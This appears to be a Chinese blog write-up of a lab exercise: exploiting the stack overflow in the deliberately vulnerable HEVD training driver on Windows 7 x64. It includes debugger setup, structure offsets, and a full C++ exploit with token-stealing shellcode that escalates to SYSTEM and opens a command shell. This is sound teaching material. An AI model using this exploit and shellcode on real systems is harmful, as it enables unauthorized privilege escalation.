

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Vang3lis">
  <meta name="keywords" content="">
  <title>HEVD win7 x64 stack overflow - Vang3lis&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_6peoq002giu.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.1.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>0x13</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2022-06-25 11:01" pubdate>
      2022年6月25日 上午
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      34
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">HEVD win7 x64 stack overflow</h1>
            
            <div class="markdown-body" id="post-body">
              <p>尝试学点新东西，应该算是很久没学了</p>
<pre><code class="hljs nsis">环境：
虚拟机：<span class="hljs-literal">Win7</span> SP1 x64
物理机：<span class="hljs-literal">Win10</span>
debugger：windbg preview
compiler：vs2022</code></pre>

<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><h3 id="VirtualKD-Redux"><a href="#VirtualKD-Redux" class="headerlink" title="VirtualKD-Redux"></a>VirtualKD-Redux</h3><p>看了很多博客，以及尝试搭建环境，最后发现还是别人写的轮子好用</p>
<p><a target="_blank" rel="noopener" href="https://github.com/4d61726b/VirtualKD-Redux">VirtualKD-Redux</a></p>
<p>下载之后，解压，把<code>target64</code>文件夹放到虚拟机中，然后在虚拟机运行<code>vminstall.exe</code>即可</p>
<p>这个安装所做的事情，如<a target="_blank" rel="noopener" href="https://blog.csdn.net/lixiangminghate/article/details/78659646">VirtualKD加速windbg双机调试速度</a>所说</p>
<p>第一件事情就是添加了一个<code>VirtualKD</code>的启动项</p>
<p>但是第二件事情，我并没找到存在<code>DDKLaunchMonitor.exe</code>文件以及对注册表修改的行为（这个注册表的行为，可以看到老版本的这个轮子，存在<code>kdpatch.reg</code>），但是我发现<code>kdbazis.dll</code>该文件被放到了<code>C:\Windows\System32</code>目录下，查阅了一些资料，提到<code>kdbazis.dll</code>是由<code>kdvm.dll</code>重命名而来（重命名是因为避免<code>win8</code>以上的操作系统文件名称冲突），其作用就是用于通信，根据运行在主机运行<code>vmmon64.exe</code>的窗口的<code>log</code>可以看到<code>VirtualKD-Redux patcher DLL successfully loaded. Patching the GuestRPC mechanism...</code>，那应该就是对于<code>GuestRPC</code>的机制进行<code>patch</code>，从而便于通信，并且该模式下，可以加载未签名的驱动，即将要加载的<code>HEVD.sys</code></p>
<p>主机在<code>win7</code>启动时，运行<code>vmmon64</code>进行监控，并启动<code>Run debugger</code></p>
<h3 id="OSRLOADER"><a href="#OSRLOADER" class="headerlink" title="OSRLOADER"></a>OSRLOADER</h3><p>加载<code>HEVD.sys</code>驱动</p>
<h3 id="Windbg-Preview"><a href="#Windbg-Preview" class="headerlink" title="Windbg Preview"></a>Windbg Preview</h3><p>需要设置一下<code>_NT_SYMBOL_PATH</code>，为<code>srv*H:\WinSymbols*https://msdl.microsoft.com/download/symbols;</code></p>
<p>在调试时，可以加载<code>HEVD.pdb</code>便于下断点，以及需要在<code>OSRLOADER</code>中<code>start service</code>才可以看到<code>HEVD</code>驱动</p>
<p>利用<code>lm m h*</code>指令就可以看到<code>HEVD</code>是否加载了</p>
<h2 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h2><p>可以通过<code>lm m HEVD</code>看<code>HEVD</code>模块的基础信息，通过<code>!drvobj HEVD 2</code>查看该驱动的详细的信息</p>
<p>在<code>IrpDeviceIoCtlHandler()</code>接口可以看到各种<code>ioctlhandler</code>，其中栈溢出为<code>0x222003</code></p>
<pre><code class="hljs cpp"><span class="hljs-keyword">case</span> <span class="hljs-number">0x222003</span>:
    DbgPrintEx(<span class="hljs-number">0x4D</span>u, <span class="hljs-number">3u</span>, <span class="hljs-string">&quot;****** HEVD_IOCTL_BUFFER_OVERFLOW_STACK ******\n&quot;</span>);
    FakeObjectNonPagedPoolNxIoctlHandler = BufferOverflowStackIoctlHandler(Irp, CurrentStackLocation);
    v7 = <span class="hljs-string">&quot;****** HEVD_IOCTL_BUFFER_OVERFLOW_STACK ******\n&quot;</span>;
    <span class="hljs-keyword">goto</span> LABEL_62;</code></pre>

<p>漏洞点十分简单，就是裸溢出</p>
<pre><code class="hljs cpp"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">BufferOverflowStackIoctlHandler</span><span class="hljs-params">(_IRP *Irp, _IO_STACK_LOCATION *IrpSp)</span></span>
<span class="hljs-function"></span>&#123;
  _NAMED_PIPE_CREATE_PARAMETERS *Parameters; <span class="hljs-comment">// rcx</span>
  __int64 result; <span class="hljs-comment">// rax</span>
  <span class="hljs-keyword">unsigned</span> __int64 Options; <span class="hljs-comment">// rdx</span>

  Parameters = IrpSp-&gt;Parameters.CreatePipe.Parameters;
  result = <span class="hljs-number">0xC0000001</span>i64;
  Options = IrpSp-&gt;Parameters.Create.Options;
  <span class="hljs-keyword">if</span> ( Parameters )
    <span class="hljs-keyword">return</span> TriggerBufferOverflowStack(Parameters, Options);
  <span class="hljs-keyword">return</span> result;
&#125;</code></pre>

<pre><code class="hljs cpp"><span class="hljs-function">__int64 __fastcall <span class="hljs-title">TriggerBufferOverflowStack</span><span class="hljs-params">(<span class="hljs-keyword">void</span> *UserBuffer, <span class="hljs-keyword">unsigned</span> __int64 Size)</span></span>
<span class="hljs-function"></span>&#123;
  <span class="hljs-keyword">char</span> v5[<span class="hljs-number">2048</span>]; <span class="hljs-comment">// [rsp+20h] [rbp-818h] BYREF</span>

  <span class="hljs-built_in">memset</span>(v5, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(v5));
  ProbeForRead(UserBuffer, <span class="hljs-number">0x800</span>ui64, <span class="hljs-number">1u</span>);
  DbgPrintEx(<span class="hljs-number">0x4D</span>u, <span class="hljs-number">3u</span>, <span class="hljs-string">&quot;[+] UserBuffer: 0x%p\n&quot;</span>, UserBuffer);
  DbgPrintEx(<span class="hljs-number">0x4D</span>u, <span class="hljs-number">3u</span>, <span class="hljs-string">&quot;[+] UserBuffer Size: 0x%X\n&quot;</span>, Size);
  DbgPrintEx(<span class="hljs-number">0x4D</span>u, <span class="hljs-number">3u</span>, <span class="hljs-string">&quot;[+] KernelBuffer: 0x%p\n&quot;</span>, v5);
  DbgPrintEx(<span class="hljs-number">0x4D</span>u, <span class="hljs-number">3u</span>, <span class="hljs-string">&quot;[+] KernelBuffer Size: 0x%X\n&quot;</span>, <span class="hljs-number">0x800</span>i64);
  DbgPrintEx(<span class="hljs-number">0x4D</span>u, <span class="hljs-number">3u</span>, <span class="hljs-string">&quot;[+] Triggering Buffer Overflow in Stack\n&quot;</span>);
  memmove(v5, UserBuffer, Size);                <span class="hljs-comment">// stack overflow</span>
  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
&#125;</code></pre>

<p>因此输入字符串覆盖到<code>ret</code>即可触发漏洞</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><h3 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h3><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;windows.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span>
<span class="hljs-function"></span>&#123;
    <span class="hljs-comment">// open device </span>
    HANDLE dev = CreateFileA(<span class="hljs-string">&quot;\\\\.\\HackSysExtremeVulnerableDriver&quot;</span>, GENERIC_READ | GENERIC_WRITE, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, OPEN_EXISTING, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">if</span> (dev == INVALID_HANDLE_VALUE)
    &#123;
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;open failed\n&quot;</span>);
        system(<span class="hljs-string">&quot;pause&quot;</span>);

        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;
    &#125;

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Device Handle: 0x%p\n&quot;</span>, dev);

    CHAR* chBuffer;
    <span class="hljs-keyword">int</span> chBufferLen = <span class="hljs-number">0x818</span>;
    
    chBuffer = (CHAR*)<span class="hljs-built_in">malloc</span>(chBufferLen + <span class="hljs-number">0x8</span> + <span class="hljs-number">0x8</span> + <span class="hljs-number">0x8</span>);
    <span class="hljs-built_in">memset</span>(chBuffer, <span class="hljs-number">0xff</span>, chBufferLen);
    <span class="hljs-built_in">memset</span>(chBuffer + chBufferLen, <span class="hljs-number">0x41</span>, <span class="hljs-number">0x8</span>);
    <span class="hljs-built_in">memset</span>(chBuffer + chBufferLen + <span class="hljs-number">0x8</span>, <span class="hljs-number">0x42</span>, <span class="hljs-number">0x8</span>);
    <span class="hljs-built_in">memset</span>(chBuffer + chBufferLen + <span class="hljs-number">0x10</span>, <span class="hljs-number">0x43</span>, <span class="hljs-number">0x8</span>);

    DWORD size_returned = <span class="hljs-number">0</span>;
    BOOL is_ok = DeviceIoControl(dev, <span class="hljs-number">0x222003</span>, chBuffer, chBufferLen + <span class="hljs-number">0x18</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, &amp;size_returned, <span class="hljs-literal">NULL</span>);
    CloseHandle(dev);
    system(<span class="hljs-string">&quot;pause&quot;</span>);

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
&#125;</code></pre>

<p>首先打开这个设备，然后于这个设备进行交互，通过调试，可以看到最后<code>ret</code>的时候，<code>rip</code>跳转到了<code>0x4141414141414141</code></p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><p>现在要做的就是提权之后再打开一个<code>cmd</code></p>
<p>目前第一个栈溢出的实验，是没开<code>SMEP</code>，因此可以直接跳转到用户态的空间执行指令，就可以直接<code>VirtualAlloc</code>一个可读可写可执行的页，从而直接执行提权的指令</p>
<p>这里是直接参考<a target="_blank" rel="noopener" href="https://www.abatchy.com/2018/01/kernel-exploitation-2">[Kernel Exploitation] 2: Payloads</a>的方法，窃取的进程级令牌</p>
<p>每个<code>windows</code>进程都有一个<a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/eprocess/index.htm">EPROCESS</a>结构体（<code>PEB</code>存在于用户空间），而这个<code>EPROCESS</code>结构包含一个<code>Token</code>字段，这个字段告诉系统该进程拥有什么权限，因此如果能找到特权进程的<code>Token</code>，将其偷过来，然后放到当前进程的<code>Token</code>上，就可以提权了</p>
<p>为了找到<code>EPROCESS</code>就需要依赖对下述结构体的了解</p>
<h4 id="数据结构"><a href="#数据结构" class="headerlink" title="数据结构"></a>数据结构</h4><p><strong>_KPCR</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/kpcr.htm">KPCR</a>代表<code>Kernel Processor Control Region</code>，内核为每一个逻辑处理器都维护一个<code>KPCR</code></p>
<p>可以看到<code>_KPRCB</code>结构体在<code>_KPCR</code>的偏移为<code>0x180</code>的地方</p>
<pre><code class="hljs sqf"><span class="hljs-number">0</span>: kd&gt; dt <span class="hljs-variable">_KPCR</span> Prcb
ntdll!<span class="hljs-variable">_KPCR</span>
   +<span class="hljs-number">0</span>x180 Prcb : <span class="hljs-variable">_KPRCB</span></code></pre>

<p><strong>_KPRCB</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/kprcb.htm">_KPRCB</a>代表<code>Kernel Processor Control Block</code>，为<code>KPCR</code>的最后一个字段，拥有内核在管理处理器和管理资源时需要随时访问的大部分内容</p>
<p>可以看到在偏移为<code>0x8</code>的地方可以拿到当前的线程，因此直接通过 <code>_KPCR+0x188</code> 就可以获取当前内核线程的结构体</p>
<pre><code class="hljs sqf"><span class="hljs-number">0</span>: kd&gt; dt <span class="hljs-variable">_KPRCB</span> CurrentThread
ntdll!<span class="hljs-variable">_KPRCB</span>
   +<span class="hljs-number">0</span>x008 CurrentThread : Ptr64 <span class="hljs-variable">_KTHREAD</span></code></pre>

<p><strong>_KTHREAD</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ke/kthread/index.htm">KTHREAD</a>是内核内部的线程结构</p>
<p><a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ke/kprocess/index.htm">KPROCESS</a>位于<code>_KTHREAD.ApcState.Process</code>之中</p>
<pre><code class="hljs sqf"><span class="hljs-number">0</span>: kd&gt; dt <span class="hljs-variable">_KTHREAD</span> ApcState
ntdll!<span class="hljs-variable">_KTHREAD</span>
   +<span class="hljs-number">0</span>x050 ApcState : <span class="hljs-variable">_KAPC_STATE</span></code></pre>

<p><strong>_KAPC_STATE</strong></p>
<p><a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/amd64_x/kprocessor_state.htm">_KAPC_STATE</a>是一个较为简单的处理器状态集合</p>
<p>因此通过<code>_KTHREAD+0x70</code>可以获得<code>_KPROCESS</code></p>
<pre><code class="hljs sqf"><span class="hljs-number">0</span>: kd&gt; dt <span class="hljs-variable">_KAPC_STATE</span> Process
ntdll!<span class="hljs-variable">_KAPC_STATE</span>
   +<span class="hljs-number">0</span>x020 Process : Ptr64 <span class="hljs-variable">_KPROCESS</span></code></pre>

<p><strong>_EPROCESS</strong></p>
<p>根据<a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/eprocess/index.htm">_EPROCESS</a>和<a target="_blank" rel="noopener" href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ke/kprocess/index.htm">_KPROCESS</a>可知</p>
<p><code>_EPROCESS</code>的第一项是<code>_KPROCESS</code>，因此找到<code>_KPROCESS</code>的地址，就相当于找到了<code>_EPROCESS</code>的地址，相当于<code>_EPROCESS</code>就是一个大结构体，其中的第一域就是<code>_KPROCESS</code>（P.S. <code>_KTHREAD</code>和<code>_ETHREAD</code>也是类似的）</p>
<pre><code class="hljs angelscript"><span class="hljs-number">0</span>: kd&gt; dt _EPROCESS
ntdll!_EPROCESS
   +<span class="hljs-number">0x000</span> Pcb              : _KPROCESS
   +<span class="hljs-number">0x160</span> ProcessLock      : _EX_PUSH_LOCK
   +<span class="hljs-number">0x168</span> CreateTime       : _LARGE_INTEGER
   +<span class="hljs-number">0x170</span> ExitTime         : _LARGE_INTEGER
   +<span class="hljs-number">0x178</span> RundownProtect   : _EX_RUNDOWN_REF
   +<span class="hljs-number">0x180</span> UniqueProcessId  : Ptr64 Void
   +<span class="hljs-number">0x188</span> ActiveProcessLinks : _LIST_ENTRY
   ...
   +<span class="hljs-number">0x208</span> Token            : _EX_FAST_REF
   ...</code></pre>

<p>因此需要覆盖的<code>Token</code>就是<code>0x208</code>偏移的域，而可以通过遍历<code>ActiveProcessLinks</code>获取<code>active</code>的进程，且已知系统进程的<code>PID</code>为<code>4</code>，因此就可以遍历<code>0x188</code>的进程链，找到<code>PID == 4</code>的进程，然后取出系统进程的<code>Token</code>，覆盖到当前进程的<code>Token</code>上</p>
<h4 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h4><p>因此<code>x64</code>的<code>shellocde</code>如下</p>
<pre><code class="hljs assembly">xor rax, rax                        ; Set ZERO
mov rax, [gs:rax + 188h]            ; Get nt!_KPCR.PcrbData.CurrentThread
                                    ; _KTHREAD is located at GS : [0x188]           

mov rax, [rax + 70h]                ; Get nt!_KTHREAD.ApcState.Process     
mov rcx, rax                        ; Copy current process _EPROCESS structure  
mov r11, rcx                        ; Store Token.RefCnt
and r11, 7

mov rdx, 4h                         ; WIN 7 SP1 SYSTEM process PID &#x3D; 0x4           

SearchSystemPID:
mov rax, [rax + 188h]               ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub rax, 188h
cmp [rax + 180h], rdx               ; Get nt!_EPROCESS.UniqueProcessId 
jne SearchSystemPID

mov rdx, [rax + 208h]               ; Get SYSTEM process nt!_EPROCESS.Token
and rdx, 0fffffffffffffff0h
or rdx, r11
mov [rcx + 208h], rdx</code></pre>

<p>备份一下<code>x86</code>的</p>
<pre><code class="hljs assembly">pushad                              ; Save registers state

; Start of Token Stealing Stub
xor eax, eax                        ; Set ZERO
mov eax, DWORD PTR fs:[eax + 124h]  ; Get nt!_KPCR.PcrbData.CurrentThread
                                    ; _KTHREAD is located at FS : [0x124]

mov eax, [eax + 50h]                ; Get nt!_KTHREAD.ApcState.Process
mov ecx, eax                        ; Copy current process _EPROCESS structure
mov edx, 04h                        ; WIN 7 SP1 SYSTEM process PID &#x3D; 0x4

SearchSystemPID:
mov eax, [eax + 0B8h]               ; Get nt!_EPROCESS.ActiveProcessLinks.Flink
sub eax, 0B8h
cmp[eax + 0B4h], edx                ; Get nt!_EPROCESS.UniqueProcessId
jne SearchSystemPID

mov edx, [eax + 0F8h]               ; Get SYSTEM process nt!_EPROCESS.Token
mov[ecx + 0F8h], edx                ; Replace target process nt!_EPROCESS.Token
                                    ; with SYSTEM process nt!_EPROCESS.Token</code></pre>

<h3 id="exp-cpp"><a href="#exp-cpp" class="headerlink" title="exp.cpp"></a>exp.cpp</h3><p>最终<code>exp</code>如下，这里的<code>shellcode</code>我是通过<code>nasm</code>进行编译的，然后再通过<code>hexdump -e &#39;16/1 &quot;%02x&quot; &quot; | &quot;&#39; -e &#39;16/1 &quot;%_p&quot; &quot;\n&quot;&#39; ./1.o</code> 变成可见字符的<code>16</code>进制，再转换的（没找到啥比较优雅的方式</p>
<pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;windows.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span>
<span class="hljs-function"></span>&#123;
    <span class="hljs-comment">// open device </span>
    HANDLE dev = CreateFileA(<span class="hljs-string">&quot;\\\\.\\HackSysExtremeVulnerableDriver&quot;</span>, GENERIC_READ | GENERIC_WRITE, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, OPEN_EXISTING, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">if</span> (dev == INVALID_HANDLE_VALUE)
    &#123;
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;open failed\n&quot;</span>);
        system(<span class="hljs-string">&quot;pause&quot;</span>);

        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;
    &#125;

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Device Handle: 0x%p\n&quot;</span>, dev);

    <span class="hljs-comment">/* nasm -f elf64 ./1.s </span>
<span class="hljs-comment">    xor rax, rax                    ; Set ZERO</span>
<span class="hljs-comment">    mov rax, gs:[rax + 188h]        ; Get nt!_KPCR.PcrbData.CurrentThread</span>
<span class="hljs-comment">                                    ; _KTHREAD is located at GS : [0x188]</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">    mov rax, [rax + 70h]            ; Get nt!_KTHREAD.ApcState.Process</span>
<span class="hljs-comment">    mov rcx, rax                    ; Copy current process _EPROCESS structure</span>
<span class="hljs-comment">    mov r11, rcx                    ; Store Token.RefCnt</span>
<span class="hljs-comment">    and r11, 7</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">    mov rdx, 4h                     ; WIN 7 SP1 SYSTEM process PID = 0x4</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">    SearchSystemPID:</span>
<span class="hljs-comment">        mov rax, [rax + 188h]           ; Get nt!_EPROCESS.ActiveProcessLinks.Flink</span>
<span class="hljs-comment">        sub rax, 188h</span>
<span class="hljs-comment">        cmp [rax + 180h], rdx            ; Get nt!_EPROCESS.UniqueProcessId</span>
<span class="hljs-comment">        jne SearchSystemPID</span>
<span class="hljs-comment"></span>
<span class="hljs-comment">    mov rdx, [rax + 208h]           ; Get SYSTEM process nt!_EPROCESS.Token</span>
<span class="hljs-comment">    and rdx, 0fffffffffffffff0h</span>
<span class="hljs-comment">    or rdx, r11</span>
<span class="hljs-comment">    mov [rcx + 208h], rdx</span>
<span class="hljs-comment">    */</span> 
    

    CHAR shellcode[] =
    &#123;	
        <span class="hljs-comment">// push rax; push rbx; push rcx; push rdx; push rdi; push rsi; push r8; push r9; push r10; push r11; push r12; push r13; push r14; push r15</span>
        <span class="hljs-string">&quot;\x50\x53\x51\x52\x57\x56\x41\x50\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57&quot;</span>
        
        <span class="hljs-comment">// change token</span>
        <span class="hljs-string">&quot;\x48\x31\xc0\x65\x48\x8b\x80\x88\x01\x00\x00\x48\x8b\x40\x70\x48\x89\xc1\x49\x89\xcb\x49\x83\xe3\x07\xba\x04\x00\x00\x00\x48\x8b\x80\x88\x01\x00\x00\x48\x2d\x88\x01\x00\x00\x48\x39\x90\x80\x01\x00\x00\x75\xea\x48\x8b\x90\x08\x02\x00\x00\x48\x83\xe2\xf0\x4c\x09\xda\x48\x89\x91\x08\x02\x00\x00&quot;</span>
        
        <span class="hljs-comment">// pop r15; pop r14; pop r13; pop r12; pop r11; pop r10; pop r9; pop r8; pop rsi; pop rdi; pop rdx; pop rcx; pop rbx; pop rax;</span>
        <span class="hljs-string">&quot;\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59\x41\x58\x5e\x5f\x5a\x59\x5b\x58&quot;</span>

        <span class="hljs-string">&quot;\x48\x83\xc4\x28&quot;</span>					<span class="hljs-comment">// add rsp, 0x28</span>
        <span class="hljs-string">&quot;\xc3&quot;</span>								<span class="hljs-comment">// ret</span>
    &#125;;

    LPVOID addr = VirtualAlloc(<span class="hljs-literal">NULL</span>, <span class="hljs-keyword">sizeof</span>(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    <span class="hljs-keyword">if</span> (addr == <span class="hljs-literal">NULL</span>)
    &#123;
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;VirtualAlloc failed\n&quot;</span>);
        system(<span class="hljs-string">&quot;pause&quot;</span>);

        <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>;
    &#125;

    RtlCopyMemory(addr, shellcode, <span class="hljs-keyword">sizeof</span>(shellcode));

    CHAR* chBuffer;
    <span class="hljs-keyword">int</span> chBufferLen = <span class="hljs-number">0x818</span>;
    
    chBuffer = (CHAR*)<span class="hljs-built_in">malloc</span>(chBufferLen + <span class="hljs-number">0x8</span> + <span class="hljs-number">0x8</span> + <span class="hljs-number">0x8</span>);
    <span class="hljs-built_in">memset</span>(chBuffer, <span class="hljs-number">0xff</span>, chBufferLen);
    <span class="hljs-comment">//memset(chBuffer + chBufferLen, 0x41, 0x8);</span>
    *(INT64*)(chBuffer + chBufferLen) = (INT64)addr;
    <span class="hljs-built_in">memset</span>(chBuffer + chBufferLen + <span class="hljs-number">0x8</span>, <span class="hljs-number">0x42</span>, <span class="hljs-number">0x8</span>);
    <span class="hljs-built_in">memset</span>(chBuffer + chBufferLen + <span class="hljs-number">0x10</span>, <span class="hljs-number">0x43</span>, <span class="hljs-number">0x8</span>);

    DWORD size_returned = <span class="hljs-number">0</span>;
    BOOL is_ok = DeviceIoControl(dev, <span class="hljs-number">0x222003</span>, chBuffer, chBufferLen + <span class="hljs-number">0x18</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, &amp;size_returned, <span class="hljs-literal">NULL</span>);
    CloseHandle(dev);
    system(<span class="hljs-string">&quot;pause&quot;</span>);

    system(<span class="hljs-string">&quot;start cmd&quot;</span>);

    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
&#125;</code></pre>

<p>需要注意的是编写<code>exp</code>，最后需要能让<code>ioctl</code>的<code>handler</code>不崩溃的返回，才可以再起<code>cmd</code>，得到一个提权之后的进程，因此要恢复<code>ret</code>到<code>BufferOverflowStackIoctlHandler</code>之后的<code>add rsp, 0x28; ret</code>指令</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><blockquote>
<p><a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-270159.htm">https://bbs.pediy.com/thread-270159.htm</a><br><a target="_blank" rel="noopener" href="https://h0mbre.github.io/HEVD_Stackoverflow_64bit/">https://h0mbre.github.io/HEVD_Stackoverflow_64bit/</a><br><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/245528">https://www.anquanke.com/post/id/245528</a><br><a target="_blank" rel="noopener" href="https://50u1w4y.github.io/site/HEVD/homePage/">https://50u1w4y.github.io/site/HEVD/homePage/</a><br><a target="_blank" rel="noopener" href="https://www.abatchy.com/2018/01/kernel-exploitation-2">https://www.abatchy.com/2018/01/kernel-exploitation-2</a></p>
</blockquote>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Learning/">Learning</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/windows-kernel/">windows kernel</a>
                    
                  </div>
                
              </div>
              
